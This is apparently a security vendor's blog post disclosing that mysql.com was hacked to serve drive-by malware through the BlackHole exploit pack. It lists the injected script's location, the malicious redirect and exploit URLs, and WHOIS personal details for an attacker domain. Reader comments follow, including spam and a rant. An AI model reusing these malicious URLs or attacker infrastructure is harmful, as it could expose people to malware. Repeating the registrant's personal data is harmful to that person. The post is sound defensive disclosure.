mysql.com hacked, infecting visitors with malware

(Credit: Wayne Huang, Chris Hsiao, NightCola Lin)
Our HackAlert 24x7 Website malware monitoring platform today indicated that mysql.com has been hacked and is currently serving malware. The highlighted section of the above screenshot is the injected script. Below is a video showing how visitors are infected when navigating to the site:


[Infection Chain]

Step 1: http://www.mysql.com

Causes the visiting browser to load the following:

Step 2: http://mysql.com/common/js/s_code_remote.js?ver=20091011

This is the injection point. The entire content of the above .js file can be found here.

The injected section is shown in the above screenshot. The decoded version is as follows:
The text version is available here. This script generates an iframe to Step 3.

Step 3: http://falosfax.in/info/in.cgi?5&ab_iframe=1&ab_badtraffic=1&antibot_hash=1255098964&ur=1&HTTP_REFERER=http://mysql.com/

Throws out a 302 redirect to Step 4.

Step 4: http://truruhfhqnviaosdpruejeslsuy.cx.cc/main.php

This domain hosts the BlackHole exploit pack. It exploits the visitor's browsing platform (the browser, the browser plugins like Adobe Flash, Adobe PDF, etc, Java, ...), and upon successful exploitation, permanently installs a piece of malware into the visitor's machine, without the visitor's knowledge. The visitor doesn't need to click or agree to anything; simply visiting mysql.com with a vulnerable browsing platform will result in an infection.

Currently, 4 out of 44 vendors on VirusTotal can detect this piece of malware.


[The Attacker]

We don't know much at this point. The following are information regarding the associated malicious domains.

falosfax.in (Step 3)
Address: 212.95.63.201
Location: Germany / Berlin
Created On:20-Jun-2011 13:17:05 UTC
Sponsoring Registrar:Transecute Solutions Pvt. Ltd. (R120-AFIN)
Registrant Name:CHRISTOPHER J KLEIN
Registrant Street1:7880 SW 132 STREET
Registrant City:MIAMI
Registrant State/Province:Florida
Registrant Postal Code:33156
Registrant Country:US
Registrant Phone:+1.3053771635
Registrant Email:cjklein54@yahoo.com
Admin ID:TS_14483505
Admin Name:CHRISTOPHER J KLEIN
Admin Organization:N/A
Admin Street1:7880 SW 132 STREET
Admin Street2:
Admin Street3:
Admin City:MIAMI
Admin State/Province:Florida
Admin Postal Code:33156
Admin Country:US
Admin Phone:+1.3053771635
Admin Phone Ext.:
Admin FAX:
Admin FAX Ext.:
Admin Email:cjklein54@yahoo.com
Tech Email:cjklein54@yahoo.com
Name Server:NS1.SKYNS1.NET
Name Server:NS2.SKYNS1.NET

truruhfhqnviaosdpruejeslsuy.cx.cc (Step 4)
Address: 46.16.233.108
Location: Sweden / Stockholm

The mysql.com website is as of now, still serving this exploit and malware.

We're in the process of contacting mysql.com. If anyone have contacts to them, please drop us an email at wayne@armorize.com

PS: Armorize is hiring presales in the bay area: http://www.linkedin.com/jobs/post?displayJobStatus=&jobId=1910971&split_page=1

52 comments:

Tazojin said...

so what if someone went to mysql.com, how would he get rid of it?

zerg_must_die said...

Does it infect every system or only Windows?

m_m said...

mysql.com acted very fast. malcode in the .js is already deleted

Wayne Huang said...

Yes!

Wayne Huang said...

Just windows.

Wayne Huang said...

Sorry @90bbab3da568b956a3861e7a1ca45e6c , we haven't had time to analyze this part yet

David said...

So what file(s) should I look for to see if I might be infected?

Blabla said...

http://dev.mysql.com/doc/ was infecting also?

Fubart said...

Is the file monitor tool you used in the MySQL.com video available somewhere to purchase?

Srock321 said...

Hey Wayne,
Just wondering how did the .exe run all by itself when you visited the site? I mean it would require some sort of admin approval before it executes say on Windows 7 machines.

-Ganesh

✔ Unverified said...

Are you aware if this is limited to certain versions of windows and is it x86/x64 specific?

Wayne Huang said...

The exe is run by exploiting the browser with javascript / flash actionscript / PDF jscript / java exploit / etc. Many exploits have the ability to turn DEP off so they'd still work on Win7.

Wayne Huang said...

No, it's a little tool I wrote myself for demo purposes. Not good enough to be released, and also it relies on some of the features of our scanning VM. You can use tools from sysinternals--free and more powerful.

Wayne Huang said...

Look for and delete files starting with "xth" under: C:\Documents and Settings\your_user_name\Local Settings\Temp  (replace "your_user_name" with your login user name in Windows)

Wayne Huang said...

The blackhole exploit pack supports a wide variety of exploits, so the actual exploit you get served, depends on the platform you use for browsing

Wayne Huang said...

We have to check but yes should be, because it causes the browser to load the same infected file: http://dev.mysql.com/common/js/s_code_remote.js?ver=20091011

✔ Unverified said...

Thank you.

Srock321 said...

Was this exploit specific to any particular browser?

Therefore said...

If I started using Firefox inside a Sandboxie Sandbox, would I be protected? I.e., is that a good general practice?

fleg said...

Do you mean FileMon?

fleg said...

FileMon is discontinued, I think Process Explorer

Tamás Fehér said...

IT journalist Brain Krebs is proud that he had 5 days advanced knowledge of this very attack by the russians and he did not notify either FBI or the victim. Please assist Uncle Sam in bringing Mr. Krebs to military justice for treason and being an accomplice of foreign enemies in times of war. Please make sure he gets to rot in SuperMax for the rest of his life! I am appaled by the cavalier approach USA takes versus organized cybercrime that is actually run by the russian-ruffian and chinese states.

How will USA fulfill its duty to protect my hungarian country within the mutual defence framework of the NATO when USA is crippled by red cyber-attacks? The fact that US citizens fail to report foreign schemes to attack US companies to the FBI speaks volumes of the moral decline of USA. Over 150 years ago President Jackson said USA was built upon universal respect on three institutions: the flag, motherhood and capital punishment. The third leg is very weak nowadays, else scum like Mr. Krebs would not dare to make profits by watching ruffian-russian organized e-criminals attack US entities.

Walter said...

Some do that, but some not. If you have info on CVE database, you can see vulnerability's targets.

JJ said...

I have Windows 7, all updates, IE9, newest Java Version 7 (newest Flash), newest Norton 360 and so on..
Am I protected?

Thanks.

Greenfield said...

Wow what a nutjob you are.

Iwwaty Jtsysa said...

Malware, only one AV detected it.

Wayne Huang said...

Likely, if you also keep these up-to-date: a)  Adobe Flash b) Adobe PDF c) Java d) real player (if you have one)

Wayne Huang said...

That's generally a good practice as long as you do not access any private data or conduct transactions inside that sandbox. Basically that sandbox would be for browsing only. To access gmail facebook etc use another sandbox that you don't use for browser arbitrary websites.

Wayne Huang said...

The blackhole exploit pack serves different exploits depending on the browsing platform. In the video I used XP + IE 6 + Java, and therefore I was served with a corresponding exploit that would work against this particular combination. If I use a different combination I can be served with a different set of exploits.

Wayne Huang said...

Yes, process explorer is very useful. But for a demo it's too complicated and that's why I wrote the little tool.

Wayne Huang said...

Hi @Iwwaty Jtsysa what do you mean?

mauro said...

 hello wayne, in the video, the blackhole kit exploit a particular vulnerability in java or just use java to execute a exe file like the classical case but without the pop-up of authorization?

Thanks, and sorry for my bad english

Vince said...

Would a visitor to the malicious site still be infected if his computer was fully up to date with all patches for Windows 7, IE9, flash, java, adobe reader etc?
thanks

xpz said...

I'll be happy to analyse the malware if you upload it somewhere.

Noobie said...

Nothing new, Java exploit is known for a while. The guys at Mysql shoul really check their security holes more often

Marki said...

Would NoScript or other Firefox plugin prevent the infection?

Dan said...

Can we have a copy :)

empowerT said...

What is the latest?  Has mysql.com regained control?

eni said...

Does this work when downloading with wget for windows?, because in this case java and web browser have nothing to do here but wget does html consuts...

Darpa said...

Que es Esto?

Max said...

I visited that site, but I was taking computer infection precautions at the time - I was standing on a rubber mat inside a cardboard box and was wearing a cap made of aluminium foil on my head. Will that have been sufficient to protect my computer?

David Agustin said...

FileMon is now Process Monitor. Very, very powerful tool.

Anonymous said...

Hi Max! I like Your "ANTYVIRUS way of life" :) I would do the same - mean the box and the rubber mat are OK - but I`m not sure of the aluminium cap.. Aren`t you afraid that the "mysql.com" electrons (or even protons - who knows?) might jump through the aluminium directly into one`s brain?!? Or even maybe already have and stay there for EVER..!! making ones a "mysql.com" ZOMBI slave or something like? No!! I will not use the alumimnium cap - I will use a PLASTIC one! Ha... and for any case will not visit that place:)

Anonymous said...

PS Wayne - good job! Max - good joke:)

Tired of malware. said...

I say start prosecuting the EVIL people who do this kind of thing,  find them,  first offense 3 years maybe, IF they are proven guilty, but  second offense life in prison  without any hope of ever seeing a computer again.
They are not showing their intellect to be superior to others,  though some do it for money, they are Hurting innocent people a LOT of innocent people, many poor people who can not afford new computers or to lose their  bank accounts  due to keyloggers etc. FIND THEM Prosecute them.

richard said...

I found your site about 2 weeks ago when I was struggling to get rid of a virus. I have a learned a lot! (though some of it is over my head) I got a lot of great help here, and at this website: http://myvirusremoval.com/

Vdagoldo said...

Hi Wayne,

Process explorer is cool but your file monitor tool is very easy to use and follow. Are you going to share this.. For us (IT), we need that type of tool which does not complicate things..

Haha said...

Life in prison??? What's the matter with you?

Alex said...

my sql projects and my sql online live interactive training athttp://bit.ly/wXKHod

Davidalonso8100 said...

Yes definitely JJ...
[url=http://huntwood.com/kitchen-cabinets/?p=283]Kitchen Cabinet Doors[/url]

Anita Yang said...

Taiwan should be proud of Armorize! I think
Proofpoint made a brilliant decision, and together we'll become a shining star
in the world's fight against APT. For Armorize, this is our first homerun, and
there will be many more to come!

Arti Vaidya said...

We all know SQL injection and XSS but very few know about authentication security problems. Refer to this http://www.valencynetworks.com/penetration-testing-services/authentication-vulnerabilities.html , it is necessary to look into this area of security problems too.

Post a Comment